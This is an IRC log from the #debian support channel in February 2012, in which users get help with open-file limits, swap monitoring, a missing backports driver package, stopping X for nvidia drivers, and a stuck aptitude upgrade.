--- | Log | opened Wed Feb 08 00:00:20 2012 |
00:00 | <sergiuliano> | this is what I am looking for, but I havent found an equivalent yet for debian |
00:01 | <XeL> | i try google lol IRPStackSize debian ;) |
00:01 | -!- | NightMonkey [~NightMonk@nightmonkey.user.oftc.net] has quit [Quit: Body blow! Body blow!] |
00:02 | <sergiuliano> | all answers comming are for windows machines |
00:03 | <XeL> | normal ;) |
00:04 | <sergiuliano> | anyway to increase the nr of connections on debian ? |
00:04 | <sergiuliano> | not only ssh connections |
00:04 | <sergiuliano> | all types |
00:05 | <XeL> | did you use a firewall ? |
00:06 | <sergiuliano> | for inomming connection yes, but for the onew I open , no |
00:07 | <XeL> | ulimit -a should returns something to dig ;) |
00:07 | <XeL> | stacksize for is set up at 8192 |
00:07 | <sergiuliano> | /var/log# ulimit |
00:07 | <sergiuliano> | unlimited |
00:08 | <XeL> | all ? |
00:08 | <sergiuliano> | this is what it return |
00:08 | -!- | faw [~faw@faw.user.oftc.net] has quit [Quit: Leaving] |
00:08 | <XeL> | try "ulimit -a" more information |
00:08 | <sergiuliano> | core file size (blocks, -c) 0 |
00:08 | <sergiuliano> | data seg size (kbytes, -d) unlimited |
00:08 | <sergiuliano> | scheduling priority (-e) 0 |
00:08 | <sergiuliano> | file size (blocks, -f) unlimited |
00:08 | <sergiuliano> | pending signals (-i) 16382 |
00:08 | -!- | sergiuliano was kicked from #debian by debhelper [use http://paste.debian.net or /msg dpkg paste] |
00:09 | -!- | sergiuliano [~sd@31.14.200.211] has joined #debian |
00:09 | <sergiuliano> | ok |
00:09 | <XeL> | huhu ;) |
00:09 | <sergiuliano> | sorry for it :) |
00:09 | <sergiuliano> | http://paste.debian.net/155536/ |
00:09 | -!- | rencka [~rencka@200.188.48.26] has joined #debian |
00:10 | <XeL> | http://ss64.com/bash/limits.conf.html |
00:11 | -!- | rencka [~rencka@200.188.48.26] has quit [] |
00:11 | <sergiuliano> | thanks, I will try this |
00:11 | -!- | Arrowmaster` [arrow@cpe-24-164-68-128.woh.res.rr.com] has quit [Remote host closed the connection] |
00:11 | <XeL> | i m not expert but i like searching ;) and learning maybe something to found on limits ;) |
00:11 | -!- | Arrowmaster [arrow@cpe-24-164-68-128.woh.res.rr.com] has joined #debian |
00:11 | -!- | fancase [~fancase@serpukhov-b1-P21.rialcom.ru] has joined #debian |
00:11 | <XeL> | .conf |
00:12 | -!- | armani [~armani@cm218-252-220-28.hkcable.com.hk] has quit [Read error: Operation timed out] |
00:12 | <XeL> | maybe open files |
00:12 | <XeL> | 1024 on your conf |
00:13 | <XeL> | and stack size 8192 |
00:13 | <XeL> | but take care on stack size (on windows got wrong when to high value) |
00:14 | -!- | carlos [~carlos@187.55.5.197] has joined #debian |
00:14 | -!- | carlos [~carlos@187.55.5.197] has quit [] |
00:14 | -!- | fancase [~fancase@serpukhov-b1-P21.rialcom.ru] has left #debian [] |
00:14 | -!- | h0n3st [~sadeq@92.42.54.28] has joined #debian |
00:15 | <XeL> | did you run something like htop to check avaibilty on server ? |
00:15 | <XeL> | on cpu et mem usage |
00:15 | <sergiuliano> | top |
00:15 | <sergiuliano> | yes |
00:15 | <sergiuliano> | memory is almost full also |
00:15 | <XeL> | almost or full ? ;) |
00:16 | <sergiuliano> | Mem: 4062252k total, 3951352k used, 110900k free, 8308k buffers |
00:16 | -!- | vrkalak [~vrkalak@66-87-4-3.pools.spcsdns.net] has quit [Quit: Leaving] |
00:16 | <XeL> | maybe is something to prevent crash |
00:17 | <XeL> | just one question how did you simulate over 1000 ssh tunel ? |
00:17 | <sergiuliano> | I have build a script that opens them |
00:17 | <sergiuliano> | I think I;ve found something |
00:17 | <sergiuliano> | http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=599138 |
00:17 | <sergiuliano> | :) |
00:17 | <XeL> | could you share ? |
00:18 | <XeL> | i try on my server |
00:18 | <XeL> | on log you dont get too many client |
00:19 | -!- | DocHolliday [~GiantSqui@108-217-220-250.lightspeed.chtnsc.sbcglobal.net] has joined #debian |
00:19 | <sergiuliano> | it is a script part of a bigger project , can not be runned without DB connections .. and other parts |
00:20 | -!- | armani [~armani@cm218-252-220-28.hkcable.com.hk] has joined #debian |
00:20 | <XeL> | ok no probs (productive project or test project ?) |
00:20 | <XeL> | got mysql on server |
00:20 | <sergiuliano> | productive |
00:20 | <sergiuliano> | seems I found something |
00:20 | <sergiuliano> | http://stackoverflow.com/questions/34588/how-do-i-change-the-number-of-open-files-limit-in-linux |
00:20 | <XeL> | ok no way ;) |
00:21 | <sergiuliano> | increasing the limit |
00:21 | <sergiuliano> | thanks :) |
00:21 | <Infiltrator> | devil: Kinda delayed, but I don't have an etc/apt/sources.list.d/debian.list either. Perhaps it's normal? |
00:21 | <sergiuliano> | gtg now |
00:21 | <sergiuliano> | thanks |
00:21 | -!- | sergiuliano [~sd@31.14.200.211] has left #debian [] |
00:22 | <XeL> | don t have too |
00:22 | -!- | crshd [~crshd@175.141.9.121] has quit [Read error: Operation timed out] |
00:22 | <XeL> | but don t know if it s normal |
00:24 | -!- | crshd [~crshd@175.141.9.121] has joined #debian |
00:25 | -!- | DocHolliday [~GiantSqui@108-217-220-250.lightspeed.chtnsc.sbcglobal.net] has quit [Quit: My hands have become the physical manifestation of jazz] |
00:28 | -!- | iamnot [~user@91.216.105.16] has joined #debian |
00:32 | -!- | iamnot [~user@91.216.105.16] has quit [Quit: leaving] |
00:35 | -!- | vladuke [~vladuke@87.226.144.85] has joined #debian |
00:38 | -!- | kevin8t8_ [~kevin8t8@75-170-33-235.eugn.qwest.net] has joined #debian |
00:38 | -!- | kevin8t8 [~kevin8t8@75-170-33-235.eugn.qwest.net] has quit [Remote host closed the connection] |
00:38 | -!- | MisterFluffy [~MisterFlu@misterfluffy.dsl.xmission.com] has quit [Remote host closed the connection] |
00:39 | -!- | jmr [~Adium@pool-96-255-241-163.washdc.fios.verizon.net] has quit [Quit: Leaving.] |
00:39 | -!- | Guest1865 [~tralala@a79-168-182-209.cpe.netcabo.pt] has quit [Ping timeout: 480 seconds] |
00:40 | -!- | mode/#debian [+l 437] by debhelper |
00:43 | -!- | edog [~edog@alcotrash.org] has quit [Ping timeout: 480 seconds] |
00:43 | -!- | cusco [~tralala@a79-168-182-209.cpe.netcabo.pt] has joined #debian |
00:44 | -!- | cusco is now known as Guest1888 |
00:44 | -!- | knoppix_ [~knoppix@ool-457d86f5.dyn.optonline.net] has joined #debian |
00:45 | -!- | knoppix_ is now known as Guest1889 |
00:45 | -!- | bjb [~bjb@sourcerer.ca] has quit [Ping timeout: 480 seconds] |
00:48 | -!- | streuner_ [~streuner@mnhm-4d00f3b2.pool.mediaWays.net] has joined #debian |
00:50 | <Infiltrator> | !tell Infiltrator about swap |
00:51 | -!- | Skipper [~Skipper@eris.htu.tuwien.ac.at] has joined #debian |
00:55 | <Infiltrator> | !tell Infiltrator about bat |
00:56 | -!- | streuner [~streuner@mnhm-5f74e10c.pool.mediaWays.net] has quit [Ping timeout: 480 seconds] |
00:56 | -!- | byonk [~byonk@114-42-90-94.dynamic.hinet.net] has joined #debian |
00:57 | -!- | tobiasr33per [~tobiasr33@toshib14.lnk.telstra.net] has quit [Ping timeout: 480 seconds] |
00:58 | -!- | bjb [~bjb@sourcerer.ca] has joined #debian |
01:01 | -!- | hever [~hever@rrcs-69-193-183-138.nyc.biz.rr.com] has joined #debian |
01:02 | -!- | hever [~hever@rrcs-69-193-183-138.nyc.biz.rr.com] has quit [Remote host closed the connection] |
01:02 | -!- | Skipper [~Skipper@eris.htu.tuwien.ac.at] has left #debian [] |
01:04 | -!- | XeL is now known as XeL64 |
01:04 | -!- | XeL64 is now known as XeL |
01:04 | -!- | XeL is now known as XeL64 |
01:05 | -!- | Quintasan_ [~quassel@p5DE79CE8.dip.t-dialin.net] has joined #debian |
01:06 | -!- | sagaci [~sagaci@ppp59-167-10-12.lns1.syd6.internode.on.net] has joined #debian |
01:07 | -!- | XeL64 is now known as XeL64[away] |
01:07 | <chealer> | !tell Infiltrator about selftell |
01:08 | -!- | XeL64[away] is now known as XeL64 |
01:09 | -!- | maxou56800 [~maxou5680@107.154.9.109.rev.sfr.net] has joined #debian |
01:09 | -!- | XeL64 is now known as XeL64[away] |
01:09 | -!- | sagaci [~sagaci@ppp59-167-10-12.lns1.syd6.internode.on.net] has quit [] |
01:09 | -!- | sagaci [~sagaci@ppp59-167-10-12.lns1.syd6.internode.on.net] has joined #debian |
01:09 | -!- | XeL64[away] is now known as XeL64 |
01:09 | -!- | XeL64 is now known as XeL64[away] |
01:10 | -!- | XeL64[away] is now known as XeL64 |
01:10 | -!- | XeL64 is now known as XeL64[away] |
01:10 | -!- | Fotografiona [~Fotografi@dslb-094-223-108-042.pools.arcor-ip.net] has joined #debian |
01:12 | -!- | Quintasan [~quassel@p5DE799B3.dip.t-dialin.net] has quit [Ping timeout: 480 seconds] |
01:14 | -!- | wd40s [~wd40s@205.178.35.196] has joined #debian |
01:21 | -!- | thkoch [~thkoch@52-188.77-83.cust.bluewin.ch] has joined #debian |
01:30 | -!- | mode/#debian [+l 443] by debhelper |
01:32 | -!- | chitchat [~guest@ppp59-167-188-93.static.internode.on.net] has joined #debian |
01:35 | -!- | ikarso [~ikarso@static-212.214.94.164.addr.tdcsong.se] has joined #debian |
01:37 | -!- | ikarso [~ikarso@static-212.214.94.164.addr.tdcsong.se] has left #debian [] |
01:41 | -!- | maxou56800 [~maxou5680@107.154.9.109.rev.sfr.net] has quit [Remote host closed the connection] |
01:42 | -!- | kevin8t8_ [~kevin8t8@75-170-33-235.eugn.qwest.net] has quit [Remote host closed the connection] |
01:42 | -!- | kevin8t8 [~kevin8t8@75-170-33-235.eugn.qwest.net] has joined #debian |
01:44 | -!- | __iron [~tobias@HSI-KBW-095-208-046-090.hsi5.kabel-badenwuerttemberg.de] has joined #debian |
01:50 | <Infiltrator> | chealer: Thanks. |
01:50 | <Infiltrator> | I have LVM set up on my laptop. Recently (past few weeks or so), about two out of three boots will fail with a message saying 'cannot find volume group blah'. A reboot (or two) solves this, though. I've seen no other issues with my disks, but could this indicate a disk failure? Or is it a kernel/software thing? |
01:50 | -!- | sagaci [~sagaci@ppp59-167-10-12.lns1.syd6.internode.on.net] has quit [Quit: Leaving] |
01:52 | -!- | Slydder [~chuck@intranet.bluedotmedia.de] has joined #debian |
01:53 | <Infiltrator> | Does '/etc/environment' need any specific packages? I don't have one, and no manpage for it either. Also, 'apt-file find /etc/environment' returns null. |
01:53 | -!- | jmux [~jan-marek@lhm246.muenchen.de] has joined #debian |
01:56 | <Infiltrator> | Is there a way to monitor/log if/how much I am swapping? |
01:57 | -!- | hele_ [~hele@cs78198129.pp.htv.fi] has quit [Quit: Konversation terminated!] |
01:57 | <zykotick9> | Infiltrator: "free" will show swap usage |
01:59 | <Infiltrator> | zykotick9: Thanks. But is there any way to know "when" and how much you're swapping? (For graphing purposes.) I know (now) that vmstat gives some info about this, but is there any easy (read: already done) way to do this or will I need to hack something up? |
02:00 | -!- | freealan [~freealan@61-217-23-170.dynamic.hinet.net] has joined #debian |
02:02 | <Infiltrator> | vmstat -s looks promising for a hack. |
02:03 | -!- | chitchat [~guest@ppp59-167-188-93.static.internode.on.net] has quit [Ping timeout: 480 seconds] |
02:03 | -!- | torjeh [~torjeh@193.157.82.30] has joined #debian |
02:03 | -!- | zlf [~user@ip68-105-53-115.no.no.cox.net] has quit [Quit: ERC Version 5.3 (IRC client for Emacs)] |
02:03 | <Infiltrator> | Can anybody explain this, though? |
02:03 | <Infiltrator> | 8430718 pages paged in |
02:03 | <Infiltrator> | 4088094 pages paged out |
02:04 | <Infiltrator> | More paged in than out? And no, I'm not coming back from a hibernation or sleep. |
02:04 | <Infiltrator> | Unless in doesn't mean into memory? |
02:05 | -!- | torjeh [~torjeh@193.157.82.30] has quit [Remote host closed the connection] |
02:08 | -!- | jibel [~j-lalleme@ACaen-754-1-17-177.w90-62.abo.wanadoo.fr] has quit [Ping timeout: 480 seconds] |
02:08 | -!- | gudjon [~quassel@fh152n2-g-kt-d2.ias.bredband.telia.com] has quit [Remote host closed the connection] |
02:09 | -!- | torjeh [~torjeh@193.157.82.30] has joined #debian |
02:14 | -!- | sander_m [~sander@office.prezent.nl] has joined #debian |
02:16 | -!- | cuckoo [~chatzilla@120.8.251.97] has joined #debian |
02:16 | <Infiltrator> | Ah, my bad; paged != swapped. |
02:16 | -!- | cuckoo [~chatzilla@120.8.251.97] has quit [] |
02:17 | <sander_m> | Hi. Could someone help me please? Apt/Aptitude isn't doing what I want it to do (again...). I am trying to install fglrx-driver from sqeeze-backports. I have added the backports repository in my sources.list (main contrib and non-free) but apt/aptitude doesn't see the backports version of the package. Only the standard squeeze one. |
02:17 | -!- | cuckoo [~cuckoo@120.8.251.97] has joined #debian |
02:17 | -!- | jibel [~j-lalleme@ACaen-754-1-11-69.w90-51.abo.wanadoo.fr] has joined #debian |
02:18 | <zykotick9> | sander_m: are you using "apt-get -t squeeze-backports ..."? |
02:18 | <sander_m> | zykotick9: Yes. Also, apt-cache policy fglrx-driver only sees one version. |
02:19 | <zykotick9> | sander_m: you did run "apt-get update" after adding backports? |
02:19 | <sander_m> | zykotick9: Of course :-) |
02:19 | <zykotick9> | just checkin' |
02:19 | -!- | wd40s [~wd40s@205.178.35.196] has quit [Read error: Operation timed out] |
02:20 | <sander_m> | Here's my sources.list: http://pastebin.com/Q6wCp8Rw |
02:20 | -!- | wd40s [~wd40s@205.178.35.196] has joined #debian |
02:20 | <sander_m> | My apt.conf says: APT::Default-Release "stable"; |
02:20 | <sander_m> | Here's the apt-cache policy output: http://pastebin.com/pb44q5VB |
02:21 | -!- | scientes [~scientes@ppp-71-139-11-201.dsl.snfc21.pacbell.net] has quit [Remote host closed the connection] |
02:22 | <zykotick9> | sander_m: are you on 32 or 64 bit? it appears it only exists for 64bit? |
02:23 | <sander_m> | zykotick9: 32-bit. I need my flash-plugin. Too bad that fglrx-driver is only backported in 64-bits. Any idea why? |
02:24 | <zykotick9> | sander_m: no idea |
02:25 | <sander_m> | zykotick9: Thanks anyway. I'll go bug the fglrx packaging team :-) |
02:28 | -!- | Slydder [~chuck@intranet.bluedotmedia.de] has quit [Ping timeout: 480 seconds] |
02:29 | -!- | Tuonick [~mettiid@93-35-243-131.ip57.fastwebnet.it] has joined #debian |
02:29 | <Tuonick> | ciao |
02:29 | <Tuonick> | !list |
02:29 | <dpkg> | VATTENE VIA! |
02:29 | -!- | Tuonick [~mettiid@93-35-243-131.ip57.fastwebnet.it] has left #debian [] |
02:31 | -!- | towo^work [~towo@port-212-202-129-192.static.qsc.de] has joined #debian |
02:31 | -!- | ompaul [~ompaul@109.76.190.238] has joined #debian |
02:33 | -!- | freealan [~freealan@61-217-23-170.dynamic.hinet.net] has quit [Quit: leaving] |
02:33 | -!- | Muzer_ [~muzer@cpc3-ando6-2-0-cust86.15-1.cable.virginmedia.com] has joined #debian |
02:34 | -!- | mlundblad [~marcus@193.12.106.2] has joined #debian |
02:37 | -!- | Muzer [~muzer@cpc3-ando6-2-0-cust86.15-1.cable.virginmedia.com] has quit [Ping timeout: 480 seconds] |
02:37 | -!- | Muzer_ is now known as Muzer |
02:42 | -!- | angelabad [~angel@150.Red-83-42-114.dynamicIP.rima-tde.net] has joined #debian |
02:43 | -!- | Texou [~Texou@pda57-1-82-231-115-185.fbx.proxad.net] has quit [Quit: WeeChat 0.3.6] |
02:45 | -!- | crshd [~crshd@175.141.9.121] has quit [Ping timeout: 480 seconds] |
02:46 | -!- | crshd [~crshd@175.141.9.121] has joined #debian |
02:46 | -!- | hobgoblinsmaster [~lminoza@62-193-63-36.stella-net.net] has joined #debian |
02:47 | -!- | toabctl [~tom@213.172.126.10] has joined #debian |
02:47 | -!- | stanza [~stanza@ppp-68-251-33-71.dsl.chcgil.ameritech.net] has joined #debian |
02:48 | -!- | stanza [~stanza@ppp-68-251-33-71.dsl.chcgil.ameritech.net] has quit [] |
02:52 | -!- | e-ndy [~jkastner@nat-pool-brq-t.redhat.com] has joined #debian |
02:55 | -!- | ukh [~ukh@egaws2575.ldc.lu.se] has joined #debian |
02:55 | -!- | JanC [~janc@ip-83-134-182-77.dsl.scarlet.be] has quit [Ping timeout: 480 seconds] |
02:58 | -!- | Slydder [~chuck@intranet.bluedotmedia.de] has joined #debian |
02:59 | -!- | ompaul [~ompaul@109.76.190.238] has quit [Quit: Konversation terminated!] |
03:00 | -!- | liverwurst [~wurst@p508C3F8E.dip.t-dialin.net] has joined #debian |
03:03 | -!- | babab [~babab@535363A6.cm-6-4b.dynamic.ziggo.nl] has joined #debian |
03:05 | -!- | JanC [~janc@ip-81-11-188-96.dsl.scarlet.be] has joined #debian |
03:06 | -!- | pkrzywicki [~pkrzywick@62-50-207-186.client.stsn.net] has joined #debian |
03:06 | -!- | alephnull [~alok@122.167.168.52] has quit [Ping timeout: 480 seconds] |
03:06 | -!- | kevin8t8 [~kevin8t8@75-170-33-235.eugn.qwest.net] has quit [Remote host closed the connection] |
03:06 | -!- | kevin8t8 [~kevin8t8@75-170-33-235.eugn.qwest.net] has joined #debian |
03:08 | -!- | anbe [~andreas@138.246.13.194] has joined #debian |
03:08 | -!- | kaziem [~devnull@82.32.78.188.dynamic.jazztel.es] has joined #debian |
03:09 | -!- | antares [~antares@gw.lipn.univ-paris13.fr] has quit [Quit: Quitte] |
03:10 | -!- | mode/#debian [+l 452] by debhelper |
03:11 | -!- | koko777 [~koko777@koko777.gorna.net] has joined #debian |
03:11 | -!- | koko777 [~koko777@koko777.gorna.net] has quit [] |
03:14 | -!- | gsimmons [~gsimmons@chmmr.gsimmons.org] has quit [Quit: leaving] |
03:16 | -!- | kriller_ [~kriller@2009ds2-gj.0.fullrate.dk] has joined #debian |
03:17 | -!- | barputer [~barputer@46.18.35.226] has joined #debian |
03:18 | -!- | barputer [~barputer@46.18.35.226] has quit [Remote host closed the connection] |
03:18 | -!- | barputer [~barputer@46.18.35.226] has joined #debian |
03:20 | -!- | barputer [~barputer@46.18.35.226] has left #debian [] |
03:20 | -!- | Fotografiona [~Fotografi@dslb-094-223-108-042.pools.arcor-ip.net] has quit [Remote host closed the connection] |
03:21 | -!- | Xavi [~xavi@164.Red-79-157-103.dynamicIP.rima-tde.net] has joined #debian |
03:21 | -!- | chattr [~mike@137.167.189.72.cfl.res.rr.com] has quit [Ping timeout: 480 seconds] |
03:23 | -!- | gani [~gani@generalnat.eglbp.corp.yahoo.com] has joined #debian |
03:24 | -!- | xharx_ [~xharx@port-92-201-174-23.dynamic.qsc.de] has joined #debian |
03:25 | -!- | Otteoke [~Otteoke@cm213.sigma1.maxonline.com.sg] has joined #debian |
03:25 | -!- | gani [~gani@generalnat.eglbp.corp.yahoo.com] has quit [] |
03:25 | -!- | Otteoke [~Otteoke@cm213.sigma1.maxonline.com.sg] has left #debian [Leaving] |
03:26 | -!- | cuckoo [~cuckoo@120.8.251.97] has quit [Quit: Ex-Chat] |
03:26 | -!- | etht [~yo@85.136.173.2.dyn.user.ono.com] has joined #debian |
03:26 | -!- | etht [~yo@85.136.173.2.dyn.user.ono.com] has quit [] |
03:27 | -!- | mosno [~mosno@c114-77-11-48.brasd3.vic.optusnet.com.au] has quit [] |
03:28 | -!- | Otteoke [~Otteoke@cm213.sigma1.maxonline.com.sg] has joined #debian |
03:29 | <Otteoke> | hi can i ask how do I kill X to install nvidia drivers? |
03:32 | -!- | tazz [~gaurav@59.162.86.164] has joined #debian |
03:34 | <XayOn> | Otteoke: invoke-rc.d gdm stop ; or service gdm stop; or killall -9 Xorg or ... lots of ways, But if you have to ask how to kill X... and you're trying to install nvidia drivers... xD |
03:34 | -!- | weland [~weland_tb@83.166.214.174] has joined #debian |
03:35 | -!- | melmothX [~melmoth@93-137-169-148.adsl.net.t-com.hr] has joined #debian |
03:35 | <Otteoke> | I'm kinda new to this linux thing |
03:37 | -!- | gry [gryllida@95.154.195.120] has joined #debian |
03:40 | -!- | gsimmons [~gsimmons@chmmr.gsimmons.org] has joined #debian |
03:41 | -!- | jmho_ [~quassel@port-87-193-192-142.static.qsc.de] has joined #debian |
03:41 | -!- | jmho [~quassel@port-87-193-192-142.static.qsc.de] has quit [Quit: No Ping reply in 180 seconds.] |
03:42 | -!- | bones_was_here [~bones@59.167.222.216] has quit [Remote host closed the connection] |
03:42 | -!- | ytrh [~yo@85.136.173.2.dyn.user.ono.com] has joined #debian |
03:42 | -!- | ytrh [~yo@85.136.173.2.dyn.user.ono.com] has quit [] |
03:44 | -!- | sigur [~sigur@host133-131-dynamic.52-79-r.retail.telecomitalia.it] has joined #debian |
03:44 | <Infiltrator> | Otteoke: XayOn: There's also ctrl+alt+backspace, isn't there? |
03:45 | <Otteoke> | doesn't work for debian i think. |
03:46 | <Otteoke> | i need help to run dual screen on debian. right now only my second screen has display. anybody can help me with this please? |
03:46 | <Infiltrator> | It's worked whenever I've tried it. :\ |
03:46 | -!- | berto [~berto@espcolo-webproxy01.nokia.com] has joined #debian |
03:47 | -!- | bones_was_here [~bones@59.167.222.216] has joined #debian |
03:47 | <Infiltrator> | Otteoke: When you boot up your comp do you see the same thing on both screens? |
03:49 | -!- | cloud [~IRC@HSI-KBW-109-192-000-093.hsi6.kabel-badenwuerttemberg.de] has joined #debian |
03:49 | -!- | lorth [~lorth@162-10-142-46.pool.kielnet.net] has joined #debian |
03:49 | -!- | drdanz [~quassel@hide-biolab.dist.unige.it] has joined #debian |
03:50 | -!- | mode/#debian [+l 461] by debhelper |
03:51 | -!- | perry [~perry@115.249.193.53] has joined #debian |
03:52 | -!- | ubuntu [~ubuntu@94.79.44.57] has joined #debian |
03:52 | -!- | ubuntu is now known as Guest1902 |
03:52 | -!- | Se-bash [~seba@host211.190-136-134.telecom.net.ar] has quit [Ping timeout: 480 seconds] |
03:52 | <Guest1902> | hello everybody ) |
03:53 | -!- | jmho_ [~quassel@port-87-193-192-142.static.qsc.de] has quit [Quit: No Ping reply in 180 seconds.] |
03:53 | -!- | jmho [~quassel@port-87-193-192-142.static.qsc.de] has joined #debian |
03:55 | -!- | sangkle [~sangkle@39.114.204.135] has joined #debian |
03:55 | -!- | Guest1902 [~ubuntu@94.79.44.57] has quit [] |
03:56 | -!- | Holborn [~holborn@170.Red-88-26-182.staticIP.rima-tde.net] has joined #debian |
03:57 | -!- | Holborn [~holborn@170.Red-88-26-182.staticIP.rima-tde.net] has quit [] |
03:57 | -!- | sangkle [~sangkle@39.114.204.135] has quit [] |
03:58 | <Otteoke> | hi |
03:59 | -!- | patrick_ [~patrick@108.89.60.117] has joined #debian |
04:00 | -!- | kriller_ [~kriller@2009ds2-gj.0.fullrate.dk] has quit [Ping timeout: 480 seconds] |
04:02 | -!- | patrick_ [~patrick@108.89.60.117] has quit [] |
04:04 | -!- | gusnan [~gusnan@h205n3c1o269.bredband.skanova.com] has joined #debian |
04:05 | -!- | ShawnFree [acidpimp__@71-88-8-110.dhcp.jcsn.tn.charter.com] has quit [Quit: Leaving] |
04:05 | <XayOn> | Infiltrator: Nope, Xorg disabled ctrl+alt+backspace |
04:05 | <Otteoke> | Infiltrator: I don't see the same thing. Only 1 screen has stuff. |
04:06 | <Otteoke> | and i installed nvidia-glx and now my debian won't boot. |
04:07 | -!- | gunkamanti [~sarefo@213.83.32.130] has joined #debian |
04:07 | -!- | tna11dis [~tna11dis@jupiter-12.student.lth.se] has joined #debian |
04:07 | -!- | tna11dis is now known as hanssvenniklasson |
04:08 | -!- | tna11nha [~Johan@jupiter-10.student.lth.se] has joined #debian |
04:08 | -!- | kriller_ [~kriller@nat.nordija.com] has joined #debian |
04:08 | -!- | tna11nha is now known as Lars |
04:08 | -!- | eko11ewi [~eko11ewi@jupiter-11.student.lth.se] has joined #debian |
04:09 | -!- | eko11ewi is now known as Carl |
04:09 | -!- | Nanokid [~tna11ost@jupiter-1.student.lth.se] has joined #debian |
04:09 | -!- | hanssvenniklasson is now known as son |
04:09 | -!- | Nanokid [~tna11ost@jupiter-1.student.lth.se] has quit [] |
04:10 | -!- | Bohr [~tna11ost@jupiter-1.student.lth.se] has joined #debian |
04:13 | -!- | sander_m [~sander@office.prezent.nl] has quit [Quit: Leaving] |
04:13 | -!- | zeroXten [~zeroXten@0x10.co.uk] has quit [Remote host closed the connection] |
04:14 | -!- | filePeter [~filePeter@2002:1f10:7b1a:2:619c:da21:788a:237a] has joined #debian |
04:18 | -!- | zeroXten [~zeroXten@0x10.co.uk] has joined #debian |
04:21 | -!- | PTKDev [~PTKDev@wireless-142-159.net.uniroma2.it] has joined #debian |
04:21 | -!- | tazz [~gaurav@59.162.86.164] has quit [Remote host closed the connection] |
04:23 | -!- | polluX[W] [~pollux@aresrh7317-2.clients.easynet.fr] has joined #debian |
04:23 | -!- | wouter_ [~wouter@dhcp-077-250-054-136.chello.nl] has joined #debian |
04:23 | -!- | wintellect [~wintellec@cpc1-nmal8-0-0-cust5.croy.cable.virginmedia.com] has joined #debian |
04:24 | -!- | Jubar [~Jubar@62.87.237.130] has joined #debian |
04:25 | <polluX[W]> | Hi |
04:25 | <polluX[W]> | I was doing an aptitude safe-upgrade on my server and it got stuck in the process. Any advice on what I should do ? |
04:26 | <devil> | polluX[W]: paste the complete output to a pastebin |
04:26 | -!- | pkrzywicki [~pkrzywick@62-50-207-186.client.stsn.net] has quit [Read error: Connection reset by peer] |
04:26 | -!- | dirichlet [~ffurnari@216.251.112.134] has joined #debian |
04:26 | <polluX[W]> | ok hold on |
04:29 | <polluX[W]> | ok here it is : http://pastebin.com/zZmr8wyV it's stuck on libapache2-mod-php5 settings just after it asked me If I want to keep my locally modified php.ini |
04:30 | -!- | mode/#debian [+l 470] by debhelper |
04:30 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has quit [Remote host closed the connection] |
04:34 | <polluX[W]> | I'm afraid simply killing the process will leave the system in a broken state, and no possibility to restart it |
04:35 | <devil> | polluX[W]: Paramétrage means configuration? |
04:35 | -!- | mafm [~quassel@hx-dnat-253.ebi.ac.uk] has joined #debian |
04:36 | <XayOn> | devil: Yes, looks like it's stuck in the configuration stage. |
04:36 | <polluX[W]> | yes (it's the french word for it) |
04:36 | <XayOn> | It might be worth a try a kill and a dpkg --configure -a |
04:36 | <devil> | yes. |
04:37 | <devil> | dpkg --configure -a wont do any harm |
04:37 | <dpkg> | no idea, devil |
04:37 | <XayOn> | heh |
04:37 | <XayOn> | thanks anyway dpkg |
04:37 | <devil> | yeah, great help :) |
04:38 | <XayOn> | polluX[W]: You might try killing the process, and, as it has already installed the packages and is in the configuration stage, re-do the configuration stage with dpkg --configure -a |
04:38 | <polluX[W]> | I can try, but wich process should I kill ? |
04:38 | <XayOn> | dpkg |
04:38 | -!- | chaudhary [~perry@115.249.193.53] has joined #debian |
04:38 | -!- | bernat [~bernat@91.Red-83-36-134.dynamicIP.rima-tde.net] has joined #debian |
04:39 | <polluX[W]> | I got one named whiptail wich seems to try to display my php.ini ... |
04:39 | <chaudhary> | clear frame buffer in QT |
04:39 | <polluX[W]> | ah, my bad, I got a dkpg too |
04:40 | <polluX[W]> | /var/lib/dpkg/info/libapache2-mod-php5.postinst configure 5.3.6-6~dotdeb.1 that must be him :) |
04:40 | <devil> | polluX[W]: whiptail just paints dialog windows like the one you seen about php.ini |
04:41 | <XayOn> | Why is it open? Shouln't have died when he answered? I'd try killing the whiptail first. |
04:41 | <devil> | XayOn: no idea if dpkg keeps it open |
04:42 | <devil> | i remember whiptail being the culprit of many a hang here about 2 years ago |
04:43 | <devil> | so killing that might suffice |
04:43 | <polluX[W]> | wow ... I just killed whiptail and it showed back on my first session (the one running aptitude) |
04:43 | -!- | dirichlet [~ffurnari@216.251.112.134] has quit [Ping timeout: 480 seconds] |
04:43 | <devil> | showed back? |
04:43 | <XayOn> | polluX[W]: Well, try the dpkg --configure -a anyway, to see if it had left something not-configured. |
04:44 | <XayOn> | devil: He's using aptitude, so, when killing the apt, the curses interface of aptitude might have showd up |
04:44 | <polluX[W]> | eheh I answered again, and the update seemed to complete ! |
04:44 | <XayOn> | I meant the dpkg |
04:44 | <devil> | XayOn: ah, i am not very familiar with aptitude, apt is myreligion :) |
04:45 | -!- | NiteHawk [~nite5755@c-76-120-6-65.hsd1.co.comcast.net] has joined #debian |
04:45 | <XayOn> | devil: Mine too, but it's what the logic said to me. Like "If i'd coded something like aptitude... how would it work?" ;) |
04:45 | <polluX[W]> | dpkg --configure -a returns nothing means it's ok then ? |
04:45 | <dpkg> | polluX[W]: I give up, what is it? |
04:45 | <XayOn> | polluX[W]: Yup |
04:45 | -!- | NiteHawk [~nite5755@c-76-120-6-65.hsd1.co.comcast.net] has quit [] |
04:45 | -!- | gedr [~gedrty@67.130.166.175] has joined #debian |
04:45 | -!- | wouter_ [~wouter@dhcp-077-250-054-136.chello.nl] has quit [] |
04:45 | <devil> | polluX[W]: aptitude -f install will tell you if the upgrade went all the way |
04:46 | <devil> | polluX[W]: if that returns zeroes, you are fine |
04:46 | <chaudhary> | how to clear frame buffer in QT |
04:46 | <devil> | chaudhary: maybe ask in #kde on freenode |
04:46 | -!- | cevi [~cevi@boron.itp.tuwien.ac.at] has joined #debian |
04:46 | -!- | bananowski [~banan@c169-195.icpnet.pl] has joined #debian |
04:47 | -!- | bananowski [~banan@c169-195.icpnet.pl] has left #debian [] |
04:47 | <polluX[W]> | aptitude -f install says everything up to date ! and apache is running good |
04:47 | <polluX[W]> | I think nothing broke up. thanks a lot guys !! |
04:48 | -!- | pos [~mark@ppp-46-236.grapevine.net.au] has joined #debian |
04:48 | <XayOn> | You're welcome polluX[W]. |
04:49 | <devil> | :) |
04:49 | -!- | gedr [~gedrty@67.130.166.175] has left #debian [] |
